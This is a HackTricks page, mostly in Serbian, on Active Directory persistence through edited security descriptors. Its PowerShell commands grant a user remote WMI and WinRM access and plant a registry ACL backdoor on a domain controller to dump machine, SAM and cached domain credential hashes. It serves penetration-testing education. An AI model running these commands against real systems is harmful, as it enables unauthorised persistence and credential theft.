hacktricks/windows-hardening/active-directory-methodology/security-descriptors.md

5.1 KiB
Raw Blame History

Security Descriptors

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Security Descriptors

From the docs: Jezik definicije bezbednosnog deskriptora (SDDL) definiše format koji se koristi za opisivanje bezbednosnog deskriptora. SDDL koristi ACE stringove za DACL i SACL: ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;

Bezbednosni deskriptori se koriste za čuvanje dozvola koje objekat ima nad objektom. Ako možete samo napraviti malo promene u bezbednosnom deskriptoru objekta, možete dobiti veoma zanimljive privilegije nad tim objektom bez potrebe da budete član privilegovane grupe.

Ova tehnika postojanosti se zasniva na sposobnosti da se osvoje sve potrebne privilegije nad određenim objektima, kako bi se mogla izvršiti radnja koja obično zahteva admin privilegije, ali bez potrebe da se bude admin.

Access to WMI

Možete dati korisniku pristup da izvrši udaljeno WMI koristeći ovo:

Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dcnamespace 'root\cimv2' -Remove -Verbose #Remove

Pristup WinRM-u

Dajte pristup winrm PS konzoli korisniku koristeći ovo:

Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove

Remote access to hashes

Pristupite registru i izvucite hash kreirajući Reg backdoor koristeći DAMP, tako da u bilo kojem trenutku možete preuzeti hash računara, SAM i bilo koju keširanu AD akreditiv na računaru. Dakle, veoma je korisno dati ovu dozvolu običnom korisniku protiv računara domen kontrolera:

# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose

Proverite Silver Tickets da biste saznali kako možete koristiti hash računa računara kontrolera domena.

{% hint style="success" %} Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Podržite HackTricks
{% endhint %}